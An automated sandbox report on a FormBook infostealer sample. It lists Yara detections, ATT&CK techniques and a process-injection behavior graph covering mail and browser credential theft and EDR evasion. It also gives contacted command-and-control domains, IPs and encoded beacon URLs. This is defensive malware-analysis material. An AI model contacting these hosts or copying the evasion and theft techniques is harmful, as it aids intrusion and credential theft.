            Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: plZuPtZoTk.exeBinary or memory string: WIN_81
            Source: plZuPtZoTk.exeBinary or memory string: WIN_XP
            Source: plZuPtZoTk.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: plZuPtZoTk.exeBinary or memory string: WIN_XPe
            Source: plZuPtZoTk.exeBinary or memory string: WIN_VISTA
            Source: plZuPtZoTk.exeBinary or memory string: WIN_7
            Source: plZuPtZoTk.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3281124203.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1911723289.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1911428216.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3285172725.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3283463490.0000000004280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3283258223.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1912223834.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3282844800.0000000004B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A41204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00A41204
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A41806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00A41806

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets241
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials12
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem1
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588857 Sample: plZuPtZoTk.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 28 www.ngmr.xyz 2->28 30 www.astrafusion.xyz 2->30 32 14 other IPs or domains 2->32 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 4 other signatures 2->50 10 plZuPtZoTk.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Found API chain indicative of sandbox detection 10->64 66 Writes to foreign memory regions 10->66 68 2 other signatures 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 GtDTOqzvEb.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 clip.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 GtDTOqzvEb.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.astrafusion.xyz 199.192.21.169, 49742, 80 NAMECHEAP-NETUS United States 22->34 36 www.030002803.xyz 161.97.142.144, 49730, 49731, 49732 CONTABODE United States 22->36 38 7 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            plZuPtZoTk.exe38%VirustotalBrowse
            plZuPtZoTk.exe66%ReversingLabsWin32.Trojan.AutoitInject
            plZuPtZoTk.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.2bhp.com/9hv6/?1ZqD=ggQIo5gV7zHF4RoJrW67zXedyj4Z9AdEETJPM44fUDmvE5zVPN+96oHBfd6Q3012XKsPi7h4Ls5HOMc1y+WXq6tX0X203QdCFZPEDkOrZS9vV9N9P/Prcpb0HgUUjs6D2w==&dbFX6=JLnL00%Avira URL Cloudsafe
            http://www.ngmr.xyz/qj8y/?dbFX6=JLnL0&1ZqD=VLsx0gmXQ4Y/FgugnqZTvhP9ZMzds9qWdo+Du/rvWhX0yMPY213bdk6OAmkXBQAvHZvuSU6Z1Lmt8KkEin8FkCRkth5DL64qsZwfe0mtTtD39/jv9X5U82qLTQbZ+JYXlg==100%Avira URL Cloudmalware
            http://www.2bhp.com/9hv6/0%Avira URL Cloudsafe
            http://www.zz82x.top/fk06/?1ZqD=6yamV9jmlYISo7pFsUNUJnURbxlWMYSXh3BqDS1TUCORGSKgOxEODjfkqzZEFLLIdUGYwb6HBQxj6hxrw3bE5aW7dF6zoZiXL70TyEdlD9ZsDXa5xNUzKEaTljshjAVXAQ==&dbFX6=JLnL0100%Avira URL Cloudmalware
            http://www.specialgift.asia/5x7s/?1ZqD=G72WLubJMS3dcb26AEgi3aGXwYX/pSO4ef8LZR/GCsxFLMdiWd/rxNP93kykZnn+RGVOZz24Lnm2tnjD2KJLN51qk8LIdSpvhcJdwUuCC545HWD+B0z6B0HNWAHTPddxeA==&dbFX6=JLnL00%Avira URL Cloudsafe
            http://www.030002803.xyz/bw0u/0%Avira URL Cloudsafe
            http://www.ophthalmo.cloud/mgg3/?1ZqD=gEC8KgLUidSdu/LaJDm0wdgPKykh22cq0AnLcRTEvs4H+h+Cn5seN/p6ZNIXUcjC7qbBK+lucO22lGJyLeY23gB1m4CBXHBSkrnrwKbx/qmY6AwmTWdie10g6VbJmKkWlw==&dbFX6=JLnL00%Avira URL Cloudsafe
            http://www.ngmr.xyz/qj8y/100%Avira URL Cloudmalware
            http://www.astrafusion.xyz0%Avira URL Cloudsafe
            http://www.ophthalmo.cloud/mgg3/0%Avira URL Cloudsafe
            http://www.030002803.xyz/bw0u/?1ZqD=QtOwEWL3Wb8oglkkfuLXaSHSreWpjDtOOnahtC8c9UbbFmMC6Wp+vCjxsEk2BpxEB3gHT+/6vot9OJxtQqkBMHc9XtXTW/yd7EP1snPpVQUS9+gXOgGxj0LXj8PsnCHHkg==&dbFX6=JLnL00%Avira URL Cloudsafe
            http://www.zz82x.top/fk06/100%Avira URL Cloudmalware
            http://www.astrafusion.xyz/pcck/0%Avira URL Cloudsafe
            http://www.lanxuanz.tech/m8yb/0%Avira URL Cloudsafe
            http://www.lanxuanz.tech/m8yb/?1ZqD=llEfdMF3fC5v4v2APCHuOWcZRuF4MZ+X2MJb9QaOtduFh6ZmbzwgisfO5x3/A5+hir6Uv7mlcSwuThCcifsMM+utKUlvw3RLEUBt7B2DyxaXSuE2zij4fUwZyaVVEgXhww==&dbFX6=JLnL00%Avira URL Cloudsafe
            http://www.specialgift.asia/5x7s/0%Avira URL Cloudsafe
            http://www.healthyloveforall.net/r22w/?1ZqD=EsRXX7vEnUJAP459o9EPGhG/Za1TDqKo9/nSY7LZO6ky9vo/5zux77ZaoqJdw57Nhrisf5e1C3TQFLNLiNcqIHJwhSyssg2wbtb6j1AMMcve2PeTzyq3dg5968Ye3A3R7Q==&dbFX6=JLnL00%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.ophthalmo.cloud
            		217.160.0.207
            		truefalse
              		unknown
              www.specialgift.asia.s.strikinglydns.com
              		35.156.117.131
              		truefalse
                		unknown
                www.ngmr.xyz
                		54.67.87.110
                		truetrue
                  		unknown
                  zhs.zohosites.com
                  		136.143.186.12
                  		truefalse
                    		high
                    zz82x.top
                    		38.47.232.196
                    		truefalse
                      		unknown
                      www.030002803.xyz
                      		161.97.142.144
                      		truetrue
                        		unknown
                        fwd3.hosts.co.uk
                        		85.233.160.22
                        		truefalse
                          		high
                          healthyloveforall.net
                          		3.33.130.190
                          		truefalse
                            		unknown
                            www.astrafusion.xyz
                            		199.192.21.169
                            		truetrue
                              		unknown
                              www.healthyloveforall.net
                              		unknown
                              		unknowntrue
                                		unknown
                                www.zz82x.top
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.bonusgame2024.online
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.2bhp.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.specialgift.asia
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.lanxuanz.tech
                                        		unknown
                                        		unknowntrue
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.2bhp.com/9hv6/false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.ngmr.xyz/qj8y/?dbFX6=JLnL0&1ZqD=VLsx0gmXQ4Y/FgugnqZTvhP9ZMzds9qWdo+Du/rvWhX0yMPY213bdk6OAmkXBQAvHZvuSU6Z1Lmt8KkEin8FkCRkth5DL64qsZwfe0mtTtD39/jv9X5U82qLTQbZ+JYXlg==false
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.2bhp.com/9hv6/?1ZqD=ggQIo5gV7zHF4RoJrW67zXedyj4Z9AdEETJPM44fUDmvE5zVPN+96oHBfd6Q3012XKsPi7h4Ls5HOMc1y+WXq6tX0X203QdCFZPEDkOrZS9vV9N9P/Prcpb0HgUUjs6D2w==&dbFX6=JLnL0false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.ophthalmo.cloud/mgg3/false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.030002803.xyz/bw0u/false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.specialgift.asia/5x7s/?1ZqD=G72WLubJMS3dcb26AEgi3aGXwYX/pSO4ef8LZR/GCsxFLMdiWd/rxNP93kykZnn+RGVOZz24Lnm2tnjD2KJLN51qk8LIdSpvhcJdwUuCC545HWD+B0z6B0HNWAHTPddxeA==&dbFX6=JLnL0false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.ngmr.xyz/qj8y/false
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.zz82x.top/fk06/?1ZqD=6yamV9jmlYISo7pFsUNUJnURbxlWMYSXh3BqDS1TUCORGSKgOxEODjfkqzZEFLLIdUGYwb6HBQxj6hxrw3bE5aW7dF6zoZiXL70TyEdlD9ZsDXa5xNUzKEaTljshjAVXAQ==&dbFX6=JLnL0false
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.ophthalmo.cloud/mgg3/?1ZqD=gEC8KgLUidSdu/LaJDm0wdgPKykh22cq0AnLcRTEvs4H+h+Cn5seN/p6ZNIXUcjC7qbBK+lucO22lGJyLeY23gB1m4CBXHBSkrnrwKbx/qmY6AwmTWdie10g6VbJmKkWlw==&dbFX6=JLnL0false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.030002803.xyz/bw0u/?1ZqD=QtOwEWL3Wb8oglkkfuLXaSHSreWpjDtOOnahtC8c9UbbFmMC6Wp+vCjxsEk2BpxEB3gHT+/6vot9OJxtQqkBMHc9XtXTW/yd7EP1snPpVQUS9+gXOgGxj0LXj8PsnCHHkg==&dbFX6=JLnL0false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.zz82x.top/fk06/false
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.lanxuanz.tech/m8yb/?1ZqD=llEfdMF3fC5v4v2APCHuOWcZRuF4MZ+X2MJb9QaOtduFh6ZmbzwgisfO5x3/A5+hir6Uv7mlcSwuThCcifsMM+utKUlvw3RLEUBt7B2DyxaXSuE2zij4fUwZyaVVEgXhww==&dbFX6=JLnL0false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.lanxuanz.tech/m8yb/false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.specialgift.asia/5x7s/false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.astrafusion.xyz/pcck/false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.healthyloveforall.net/r22w/?1ZqD=EsRXX7vEnUJAP459o9EPGhG/Za1TDqKo9/nSY7LZO6ky9vo/5zux77ZaoqJdw57Nhrisf5e1C3TQFLNLiNcqIHJwhSyssg2wbtb6j1AMMcve2PeTzyq3dg5968Ye3A3R7Q==&dbFX6=JLnL0false
                                          • Avira URL Cloud: safe
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://duckduckgo.com/chrome_newtabclip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/ac/?q=clip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoclip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.astrafusion.xyzGtDTOqzvEb.exe, 00000008.00000002.3285172725.0000000004A9E000.00000040.80000000.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.strikingly.com/?utm_source=404&utm_medium=internal&utm_campaign=404_redirectGtDTOqzvEb.exe, 00000008.00000002.3283553222.00000000031BE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://www.zoho.com/sites/images/professionally-crafted-themes.pngclip.exe, 00000005.00000002.3284516753.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000002.3283553222.0000000003674000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    		high
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=clip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=clip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.ecosia.org/newtab/clip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.zoho.com/sites/?src=parkeddomain&dr=www.lanxuanz.techclip.exe, 00000005.00000002.3284516753.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000002.3283553222.0000000003674000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://ac.ecosia.org/autocomplete?q=clip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchclip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumbclip.exe, 00000005.00000002.3284516753.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000002.3283553222.0000000003674000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=clip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    136.143.186.12
                                                                    		zhs.zohosites.comUnited States
                                                                    		2639ZOHO-ASUSfalse
                                                                    161.97.142.144
                                                                    		www.030002803.xyzUnited States
                                                                    		51167CONTABODEtrue
                                                                    199.192.21.169
                                                                    		www.astrafusion.xyzUnited States
                                                                    		22612NAMECHEAP-NETUStrue
                                                                    35.156.117.131
                                                                    		www.specialgift.asia.s.strikinglydns.comUnited States
                                                                    		16509AMAZON-02USfalse
                                                                    38.47.232.196
                                                                    		zz82x.topUnited States
                                                                    		174COGENT-174USfalse
                                                                    54.67.87.110
                                                                    		www.ngmr.xyzUnited States
                                                                    		16509AMAZON-02UStrue
                                                                    85.233.160.22
                                                                    		fwd3.hosts.co.ukUnited Kingdom
                                                                    		8622ISIONUKNamescoLimitedGBfalse
                                                                    217.160.0.207
                                                                    		www.ophthalmo.cloudGermany
                                                                    		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                                    3.33.130.190
                                                                    		healthyloveforall.netUnited States
                                                                    		8987AMAZONEXPANSIONGBfalse

                                                                    General Information

                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                    Analysis ID:1588857
                                                                    Start date and time:2025-01-11 06:29:31 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 9m 39s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Run name:Run with higher sleep bypass
                                                                    Number of analysed new started processes analysed:10
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:2
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:plZuPtZoTk.exe
                                                                    renamed because original name is a hash value
                                                                    Original Sample Name:5dd59f906130866850ab2c712dae59d43c0e0e30a6554022567957037c35dc28.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/3@10/9
                                                                    EGA Information:
                                                                    • Successful, ratio: 75%
                                                                    HCA Information:
                                                                    • Successful, ratio: 96%
                                                                    • Number of executed functions: 45
                                                                    • Number of non-executed functions: 295
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 20.12.23.50
                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Execution Graph export aborted for target GtDTOqzvEb.exe, PID 5932 because it is empty
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    No simulations

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    136.143.186.12ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                    • www.everythlngict.org/hxjq/
                                                                    r6lOHDg9N9.exeGet hashmaliciousFormBookBrowse
                                                                    • www.lanxuanz.tech/tpid/
                                                                    Purchase_Order_pdf.exeGet hashmaliciousFormBookBrowse
                                                                    • www.lanxuanz.tech/1q08/
                                                                    jeez.exeGet hashmaliciousFormBookBrowse
                                                                    • www.lanxuanz.tech/m8yb/
                                                                    PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                                    • www.lanxuanz.tech/ivo1/
                                                                    z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                    • www.lanxuanz.tech/1q08/
                                                                    NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                    • www.lanxuanz.tech/ivo1/
                                                                    DEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                                    • www.lanxuanz.tech/ivo1/
                                                                    PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                                    • www.lanxuanz.tech/ivo1/
                                                                    x.exeGet hashmaliciousFormBookBrowse
                                                                    • www.lanxuanz.tech/em49/
                                                                    161.97.142.144gKvjKMCUfq.exeGet hashmaliciousFormBookBrowse
                                                                    • www.nb-shenshi.buzz/mz7t/
                                                                    SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                                    • www.030002059.xyz/er88/
                                                                    RFQ3978 39793980.pdf.exeGet hashmaliciousFormBookBrowse
                                                                    • www.030002350.xyz/1a7n/
                                                                    SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                    • www.070001813.xyz/gn0y/
                                                                    PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                    • www.070002018.xyz/6m2n/
                                                                    New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                    • www.070001325.xyz/gebt/?INvlf=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==&afo=JnyH0Z2
                                                                    Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • www.070002018.xyz/6m2n/
                                                                    Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                                    • www.030002613.xyz/xd9h/
                                                                    Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • www.030002449.xyz/cfqm/
                                                                    PAYMENT_TO_NFTC_(CUB)_26-11-24.docGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                    • www.070001955.xyz/7zj0/

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    www.specialgift.asia.s.strikinglydns.comMGQeZjDXc3.exeGet hashmaliciousFormBookBrowse
                                                                    • 18.176.133.53
                                                                    wavjjT3sEq.exeGet hashmaliciousFormBookBrowse
                                                                    • 35.156.117.131
                                                                    Order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • 35.156.117.131
                                                                    jeez.exeGet hashmaliciousFormBookBrowse
                                                                    • 35.156.117.131
                                                                    www.ophthalmo.cloudMGQeZjDXc3.exeGet hashmaliciousFormBookBrowse
                                                                    • 217.160.0.207
                                                                    s7Okni1gfE.exeGet hashmaliciousFormBookBrowse
                                                                    • 217.160.0.207
                                                                    jeez.exeGet hashmaliciousFormBookBrowse
                                                                    • 217.160.0.207
                                                                    sa7Bw41TUq.exeGet hashmaliciousFormBookBrowse
                                                                    • 217.160.0.207
                                                                    www.ngmr.xyzMGQeZjDXc3.exeGet hashmaliciousFormBookBrowse
                                                                    • 54.67.87.110
                                                                    s7Okni1gfE.exeGet hashmaliciousFormBookBrowse
                                                                    • 54.67.87.110
                                                                    Purchase_Order_pdf.exeGet hashmaliciousFormBookBrowse
                                                                    • 54.67.87.110
                                                                    rHSBCBank_Paymentswiftcpy.exeGet hashmaliciousFormBookBrowse
                                                                    • 54.67.87.110
                                                                    jeez.exeGet hashmaliciousFormBookBrowse
                                                                    • 54.67.87.110
                                                                    -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                    • 54.67.87.110
                                                                    z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                    • 54.67.87.110
                                                                    UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 54.67.87.110
                                                                    zhs.zohosites.comek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                    • 136.143.186.12
                                                                    r6lOHDg9N9.exeGet hashmaliciousFormBookBrowse
                                                                    • 136.143.186.12
                                                                    Purchase_Order_pdf.exeGet hashmaliciousFormBookBrowse
                                                                    • 136.143.186.12
                                                                    jeez.exeGet hashmaliciousFormBookBrowse
                                                                    • 136.143.186.12
                                                                    PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
